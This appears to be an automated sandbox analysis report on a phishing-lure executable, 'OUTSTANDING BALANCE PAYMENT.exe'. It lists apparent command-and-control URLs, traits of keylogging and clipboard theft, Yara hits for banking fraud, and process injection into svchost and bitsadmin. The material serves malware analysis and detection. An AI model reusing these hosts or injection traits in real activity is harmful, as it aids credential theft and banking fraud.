Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:30:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: svchost.exe, 00000002.00000003.2223313164.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2223964897.0000000000848000.00000004.00000020.00020000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000003.2203222395.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000002.3859724974.0000000000C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 00000005.00000002.3862814118.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3861374632.0000000003E3C000.00000004.10000000.00040000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000006.00000002.3860302388.00000000039CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/d9ku/?QjtpF=dVl4&lJoLl=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2
                Source: hvGvYDBEAaXP.exe, 00000006.00000002.3861800488.0000000005440000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.learnwithus.site
                Source: hvGvYDBEAaXP.exe, 00000006.00000002.3861800488.0000000005440000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.learnwithus.site/alu5/
                Source: bitsadmin.exe, 00000005.00000003.2437060973.0000000007918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000005.00000002.3861374632.0000000003986000.00000004.10000000.00040000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000006.00000002.3860302388.0000000003516000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?hh=
                Source: bitsadmin.exe, 00000005.00000003.2437060973.0000000007918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000005.00000003.2437060973.0000000007918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000005.00000003.2437060973.0000000007918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 00000005.00000003.2437060973.0000000007918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 00000005.00000003.2437060973.0000000007918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000005.00000003.2437060973.0000000007918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000005.00000002.3859638614.0000000002B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth
                Source: bitsadmin.exe, 00000005.00000002.3859638614.0000000002B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bitsadmin.exe, 00000005.00000002.3859638614.0000000002B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000005.00000002.3859638614.0000000002B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bitsadmin.exe, 00000005.00000002.3859638614.0000000002B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
                Source: bitsadmin.exe, 00000005.00000002.3859638614.0000000002B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bitsadmin.exe, 00000005.00000002.3859638614.0000000002B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000005.00000003.2431999740.0000000007841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: bitsadmin.exe, 00000005.00000003.2437060973.0000000007918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: bitsadmin.exe, 00000005.00000003.2437060973.0000000007918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BB6B0C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00BB6D07
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BB6B0C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00BA2B37
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BCF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00BCF7FF

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2255087515.0000000000A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2254901007.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859242171.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3861800488.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859423484.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859475868.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2255503523.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3860205283.00000000046F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: This is a third-party compiled AutoIt script.0_2_00B63D19
                Source: OUTSTANDING BALANCE PAYMENT.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000000.2009024237.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_90e851a8-4
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000000.2009024237.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3dd491d5-5
                Source: OUTSTANDING BALANCE PAYMENT.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2b1b1a23-8
                Source: OUTSTANDING BALANCE PAYMENT.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0847511e-c
                Source: initial sampleStatic PE information: Filename: OUTSTANDING BALANCE PAYMENT.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CA93 NtClose,2_2_0042CA93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B60 NtClose,LdrInitializeThunk,2_2_02F72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02F72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,2_2_02F735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74340 NtSetContextThread,2_2_02F74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74650 NtSuspendThread,2_2_02F74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AF0 NtWriteFile,2_2_02F72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AD0 NtReadFile,2_2_02F72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AB0 NtWaitForSingleObject,2_2_02F72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BF0 NtAllocateVirtualMemory,2_2_02F72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BE0 NtQueryValueKey,2_2_02F72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BA0 NtEnumerateValueKey,2_2_02F72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B80 NtQueryInformationFile,2_2_02F72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EE0 NtQueueApcThread,2_2_02F72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EA0 NtAdjustPrivilegesToken,2_2_02F72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E80 NtReadVirtualMemory,2_2_02F72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E30 NtWriteVirtualMemory,2_2_02F72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FE0 NtCreateFile,2_2_02F72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FB0 NtResumeThread,2_2_02F72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FA0 NtQuerySection,2_2_02F72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F90 NtProtectVirtualMemory,2_2_02F72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F60 NtCreateProcessEx,2_2_02F72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F30 NtCreateSection,2_2_02F72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CF0 NtOpenProcess,2_2_02F72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CC0 NtQueryVirtualMemory,2_2_02F72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CA0 NtQueryInformationToken,2_2_02F72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C70 NtFreeVirtualMemory,2_2_02F72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C60 NtCreateKey,2_2_02F72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C00 NtQueryInformationProcess,2_2_02F72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DD0 NtDelayExecution,2_2_02F72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DB0 NtEnumerateKey,2_2_02F72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D30 NtUnmapViewOfSection,2_2_02F72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D10 NtMapViewOfSection,2_2_02F72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D00 NtSetInformationFile,2_2_02F72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73090 NtSetValueKey,2_2_02F73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73010 NtOpenDirectoryObject,2_2_02F73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F739B0 NtGetContextThread,2_2_02F739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D70 NtOpenThread,2_2_02F73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D10 NtOpenProcessToken,2_2_02F73D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E54340 NtSetContextThread,LdrInitializeThunk,5_2_02E54340
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E54650 NtSuspendThread,LdrInitializeThunk,5_2_02E54650
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52AF0 NtWriteFile,LdrInitializeThunk,5_2_02E52AF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52AD0 NtReadFile,LdrInitializeThunk,5_2_02E52AD0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02E52BE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02E52BF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02E52BA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52B60 NtClose,LdrInitializeThunk,5_2_02E52B60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02E52EE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02E52E80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52FE0 NtCreateFile,LdrInitializeThunk,5_2_02E52FE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52FB0 NtResumeThread,LdrInitializeThunk,5_2_02E52FB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52F30 NtCreateSection,LdrInitializeThunk,5_2_02E52F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02E52CA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52C60 NtCreateKey,LdrInitializeThunk,5_2_02E52C60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02E52C70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02E52DF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52DD0 NtDelayExecution,LdrInitializeThunk,5_2_02E52DD0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02E52D30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02E52D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E535C0 NtCreateMutant,LdrInitializeThunk,5_2_02E535C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E539B0 NtGetContextThread,LdrInitializeThunk,5_2_02E539B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52AB0 NtWaitForSingleObject,5_2_02E52AB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52B80 NtQueryInformationFile,5_2_02E52B80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52EA0 NtAdjustPrivilegesToken,5_2_02E52EA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52E30 NtWriteVirtualMemory,5_2_02E52E30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52FA0 NtQuerySection,5_2_02E52FA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52F90 NtProtectVirtualMemory,5_2_02E52F90
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52F60 NtCreateProcessEx,5_2_02E52F60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52CF0 NtOpenProcess,5_2_02E52CF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52CC0 NtQueryVirtualMemory,5_2_02E52CC0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52C00 NtQueryInformationProcess,5_2_02E52C00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52DB0 NtEnumerateKey,5_2_02E52DB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E52D00 NtSetInformationFile,5_2_02E52D00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E53090 NtSetValueKey,5_2_02E53090
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E53010 NtOpenDirectoryObject,5_2_02E53010
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E53D70 NtOpenThread,5_2_02E53D70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E53D10 NtOpenProcessToken,5_2_02E53D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_00339220 NtCreateFile,5_2_00339220
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_00339390 NtReadFile,5_2_00339390
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_00339480 NtDeleteFile,5_2_00339480
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_00339520 NtClose,5_2_00339520
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_00339690 NtAllocateVirtualMemory,5_2_00339690
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA6685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00BA6685
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B9ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B9ACC5
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00BA79D3
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B6E3B00_2_00B6E3B0
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B8B0430_2_00B8B043
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B732000_2_00B73200
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B9410F0_2_00B9410F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B802A40_2_00B802A4
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B9038E0_2_00B9038E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B806D90_2_00B806D9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B9467F0_2_00B9467F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BCAACE0_2_00BCAACE
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B94BEF0_2_00B94BEF
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B8CCC10_2_00B8CCC1
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B66F070_2_00B66F07
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B6AF500_2_00B6AF50
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BC31BC0_2_00BC31BC
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B8D1B90_2_00B8D1B9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B7B11F0_2_00B7B11F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B8123A0_2_00B8123A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B9724D0_2_00B9724D
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B693F00_2_00B693F0
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA13CA0_2_00BA13CA
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B7F5630_2_00B7F563
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BAB6CC0_2_00BAB6CC
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B696C00_2_00B696C0
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B677B00_2_00B677B0
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BCF7FF0_2_00BCF7FF
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B979C90_2_00B979C9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B7FA570_2_00B7FA57
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B73B700_2_00B73B70
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B69B600_2_00B69B60
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B67D190_2_00B67D19
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B89ED00_2_00B89ED0
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B7FE6F0_2_00B7FE6F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B67FA30_2_00B67FA3
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_016B76480_2_016B7648
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004189932_2_00418993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401ACB2_2_00401ACB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F0B32_2_0042F0B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101D32_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032F02_2_004032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A902_2_00402A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3D32_2_0040E3D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103F32_2_004103F3
